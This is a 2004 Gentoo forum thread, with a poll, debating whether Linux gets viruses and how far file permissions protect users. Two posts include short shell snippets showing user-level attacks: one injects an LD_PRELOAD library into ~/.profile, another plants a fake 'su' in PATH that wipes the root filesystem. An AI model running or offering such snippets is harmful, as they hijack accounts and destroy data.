Gentoo Forums
Quick Search: in
viruses on linux
View unanswered posts
View posts from last 24 hours

Goto page 1, 2  Next  
Reply to topic    Gentoo Forums Forum Index Off the Wall
View previous topic :: View next topic  

Have you (or your computer) been infected with linux viruses?
Yes!
0%
 0%  [ 1 ]
No!
99%
 99%  [ 113 ]
Total Votes : 114

fisherking
Tux's lil' helper
Tux's lil' helper

PostPosted: Wed Oct 27, 2004 10:36 am    Post subject: viruses on linux Reply with quote

Hi,
I recently read a article about linux security vs. windows security and there was some discussion about viruses. I could find any information about how many viruses there is for linux.

How many of you have experince viruses (and/or worms) on linux and is there anyone who knows any good statistic about linux viruses?

personally I have never experiance anything like virus- or vorm-related under my six years as a linux user....
Deranger
Veteran
Veteran

PostPosted: Wed Oct 27, 2004 10:40 am    Post subject: Reply with quote

Nah, last time I had viruses on my comp, I used Windows ;)
placeholder
Advocate
Advocate

PostPosted: Wed Oct 27, 2004 10:41 am    Post subject: Reply with quote

Oktane wrote:
Nah, last time I had viruses on my comp, I used Windows ;)

Same here. Permissions kind of kill idea of malicious viruses in Linux. :wink:
SecretSquirrel
n00b
n00b

PostPosted: Wed Oct 27, 2004 12:09 pm    Post subject: Reply with quote

Google is your friend

http://www.google.com/search?hl=en&q=linux+virus

6th link down, just a small sample

http://www.viruslibrary.com/virusinfo/Linux.htm

Virii are able to be written and run on Linux, so get over yourself. I haven't had a virus on Linux OR Windows for 10 years now.
RdsArts
Apprentice
Apprentice

PostPosted: Wed Oct 27, 2004 12:11 pm    Post subject: Reply with quote

*sigh*

Code:
#!/bin/sh
echo #!/bin/sh > .profile_bad_malicious
echo LD_PRELOAD=${HOME}/.evil_bad_virus_that_remaps_write_in_libc >> .profile_bad_malicious
cat .profile >> .profile_bad_malicious
mv .profile_bad_malicious .profile

Permissions != cure all. Expectally when you install everything by giving unknown code full access as root on your system.
Aleksejs
n00b
n00b

PostPosted: Wed Oct 27, 2004 12:20 pm    Post subject: Reply with quote

While I voted "No" I must say that "I don't know, really" since I don't have antivirus or IDS installed on mylinux box. So there is no way I can tell. Not all viruses do easy noticable damage to your files or consume noticable amounts of resources (memory, bandwidth etc).
monkeyhead
Tux's lil' helper
Tux's lil' helper

PostPosted: Wed Oct 27, 2004 12:53 pm    Post subject: Reply with quote

i haven't had a problem... but, yeah, i agree that linux is not virus proof.
miqorz
Veteran
Veteran

PostPosted: Wed Oct 27, 2004 1:55 pm    Post subject: Reply with quote

Well to get a virus you'd need to run something as root, and the only things I do as root is emerge and config X or grub or MAYBE install a new kernel.
gullyg
Tux's lil' helper
Tux's lil' helper

PostPosted: Wed Oct 27, 2004 3:59 pm    Post subject: Reply with quote

miqorz wrote:
Well to get a virus you'd need to run something as root, and the only things I do as root is emerge and config X or grub or MAYBE install a new kernel.

Same here - but will we hear alot more "linux is as vunerable as windows" if distros follow the linspire route and encourage users to use root all the time. After all it does make using linux easyier for a new user.

CPCFF
Ari Rahikkala
Guru
Guru

PostPosted: Wed Oct 27, 2004 4:13 pm    Post subject: Reply with quote

What Aleksejs said. I'd love to say "no, no viruses here" and I believe that is the case since I do keep my system pretty much up to date (especially everything that you can connect to from the rest of the world)... but I can't afford to think that I'm 100% secure. I know I haven't taken everything into account (for instance, I haven't read the source code of all of the software I'm using, and I haven't checked my gcc binary for the kind of hack that you can read about in "Reflections on trusting trust", and I haven't checked the CPU microcode, and...) It just doesn't happen unless I turn off this box.
feld
Guru
Guru

PostPosted: Wed Oct 27, 2004 4:25 pm    Post subject: Reply with quote

thats why i use linux. no viruses running rampant, and no spyware.

according to Webroot - they have YET to detect a single spyware/malware to exist on a mac or linux operating system.

take that, yah filthy winders!

-Feld
frogb
n00b
n00b

PostPosted: Wed Oct 27, 2004 4:38 pm    Post subject: Reply with quote

Run this as non-root, and carry on your normal work if it can't affect your system. (rm changed to RM)
Quote:

#!/bin/sh

echo "PATH=\"~:$PATH\"" >> ~/.bashrc

cat > ~/su << EOF
#!/bin/sh
/bin/su -c "RM -rf / >/dev/null"
EOF

chmod 755 ~/su
nyteryda
Guru
Guru

PostPosted: Wed Oct 27, 2004 4:50 pm    Post subject: Reply with quote

miqorz wrote:

Thats actually not true.

Worms for example which are virus that execute without user action, might and have been writen to exploit security holes in various running server programs for example the Open_SSL in Apache, now these programs might not bebale to "rm -rf / " they can however still propergate on do damage, say to your website or perhaps even run futher exploits to raise they user level.

However Linux Virus are few and far between (at present) compared to Windows, and tend to required more work to be effective.

N.B people tend to define viruses differently but the defintion of worm as i belive is correct to most people
codergeek42
Bodhisattva
Bodhisattva

PostPosted: Wed Oct 27, 2004 4:54 pm    Post subject: Reply with quote

If you're running server processes though, it's usually a more secure idea to run them as their own user and in a chroot-jail, isn't it?
nyteryda
Guru
Guru

PostPosted: Wed Oct 27, 2004 5:14 pm    Post subject: Reply with quote

codergeek42 wrote:
If you're running server processes though, it's usually a more secure idea to run them as their own user and in a chroot-jail, isn't it?

Yes, but that depends on weather its possible/practical too, If you want public_html in users home directorys and stuff then that really becomes more of a problem particually if you want to mix different servers and access to different user say FTP and WWW, it also doesn't necessarily stop virus'es from propergateing (and working as relays too maybe) , also if we are making honest comparison to windows there are things things you can do in windows to reduce virus risk, and setup limit user accounts so really we need to look at it from a more normal setup than a security conscieous and knowledgeable one or we have to look at windows in its most secure state and not its default state.
SecretSquirrel
n00b
n00b

PostPosted: Wed Oct 27, 2004 5:36 pm    Post subject: Reply with quote

nyteryda wrote:
codergeek42 wrote:

Yes, but that depends on weather its possible/practical too, If you want public_html in users home directorys and stuff then that really becomes more of a problem particually if you want to mix different servers and access to different user say FTP and WWW, it also doesn't necessarily stop virus'es from propergateing (and working as relays too maybe) , also if we are making honest comparison to windows there are things things you can do in windows to reduce virus risk, and setup limit user accounts so really we need to look at it from a more normal setup than a security conscieous and knowledgeable one or we have to look at windows in its most secure state and not its default state.

Which leads to the ultimate realization that anyone in the computer security world worth 2 pennies states: Security is not a quality, but a process.
ChojinDSL
l33t
l33t

PostPosted: Wed Oct 27, 2004 5:51 pm    Post subject: Reply with quote

Never had a virus on linux either. But I think the linux community is taking the matter not seriously enough. As it stands now, perhaps a linux virus is not an immediate threat, but I think its only a matter of time before we see some "progress" made in this area.

Because of the solid multi user system that linux has, i.e. default is non root user mode. I think a virus might have little chance IF everything works as it should. However, I dont see why a virus couldnt make use of an exploit just like any other hacker.

Maybe in the future what we will se on linux is not a virus in the classical sense, but perhaps an automated hack/exploit/rootkit attack.

Imagine if someone where to write a virus, which targets windows pcs as first step only. Takes over the machine, and while idle and online launches a "hacker-like" attack on any linux machines it can find. Perhaps it would check if you have something like putty installed and see which ssh servers you have saved in there.
Of course if its on a mixed network, it wouldnt even have to do that.

All I'm saying is, just because its not a problem at the moment, we shouldnt be resting on our laurels.

Remember, "assumption is the mother of all f*ck-ups".
codergeek42
Bodhisattva
Bodhisattva

PostPosted: Wed Oct 27, 2004 5:55 pm    Post subject: Reply with quote

ChojinDSL wrote:
However, I dont see why a virus couldnt make use of an exploit just like any other hacker.
$what_you_just_said ~= s/hacker/cracker/ig;
Quote:
Remember, "assumption is the mother of all f*ck-ups".
I like that quote.
nyteryda
Guru
Guru

PostPosted: Wed Oct 27, 2004 6:18 pm    Post subject: Reply with quote

ChojinDSL wrote:

Maybe in the future what we will se on linux is not a virus in the classical sense, but perhaps an automated hack/exploit/rootkit attack.

I belive that is actually one type of virus in a clasical sense, a worm.

Quote:

Imagine if someone where to write a virus, which targets windows pcs as first step only. Takes over the machine, and while idle and online launches a "hacker-like" attack on any linux machines it can find. Perhaps it would check if you have something like putty installed and see which ssh servers you have saved in there.
Of course if its on a mixed network, it wouldnt even have to do that.

What i think would be interesting is a modular worm that once its installed on a computer it has file sharing network capabilities like kazza or emule or something, it scans host machines for programs that may contain information Outlook (or putty like you said) downloads modules for getting data then starts scanning random IP address'es and their services to determin OS's and server applications then downloads relevent modules for attacking based on the scan results, like a ssh/IIS/apache/ attacks which ever relevent. I don't know maybe thats a bit farfetched ?

Quote:

All I'm saying is, just because its not a problem at the moment, we shouldnt be resting on our laurels.

I totally agree, With more and more servers being linux more and more virus will occur, just probably not the same kind of email virus that plagues linux.
dumpsterm0uth
n00b
n00b

PostPosted: Wed Oct 27, 2004 7:34 pm    Post subject: Reply with quote

never had a virus, never will ;), i assume people can make them in c++, but who would want to waste there time?
Naughtyus
Guru
Guru

PostPosted: Wed Oct 27, 2004 7:47 pm    Post subject: Reply with quote

I got rooted through a proftp hole 4 or 5 years ago
miqorz
Veteran
Veteran

PostPosted: Wed Oct 27, 2004 8:14 pm    Post subject: Reply with quote

Naughtyus wrote:
I got rooted through a proftp hole 4 or 5 years ago

Thats not a virus. It's called getting owned for being a dumbass.
Stormy Eyes
Veteran
Veteran

PostPosted: Wed Oct 27, 2004 8:16 pm    Post subject: Reply with quote

miqorz wrote:

Chill out, miqorz. It was 4 or 5 years ago, when he was probably a newbie. He's learned from his mistake.
miqorz
Veteran
Veteran

PostPosted: Wed Oct 27, 2004 8:18 pm    Post subject: Reply with quote

Stormy Eyes wrote:
miqorz wrote:

Chill out, miqorz. It was 4 or 5 years ago, when he was probably a newbie. He's learned from his mistake.

I'm on edge today, but seriously. That's not a virus.

Past mistakes are fine and dandy but mistaking that for a virus even 5 years after the fact is stupid.
homeobocks
Guru
Guru

Location: I'm from Canada, and they say I'm a little slow . . . eh?

PostPosted: Wed Oct 27, 2004 11:15 pm    Post subject: Reply with quote

I love Bliss (, a Linux virus). Bliss (, a Linux virus) keeps a log of all files infected, and, with a command line argument, you can disinfect all infected files. Although, technically, it is a virus-like trojan with worm-like features.
Reply to topic    Gentoo Forums Forum Index Off the Wall All times are GMT
Goto page 1, 2  Next
Page 1 of 2

Jump to: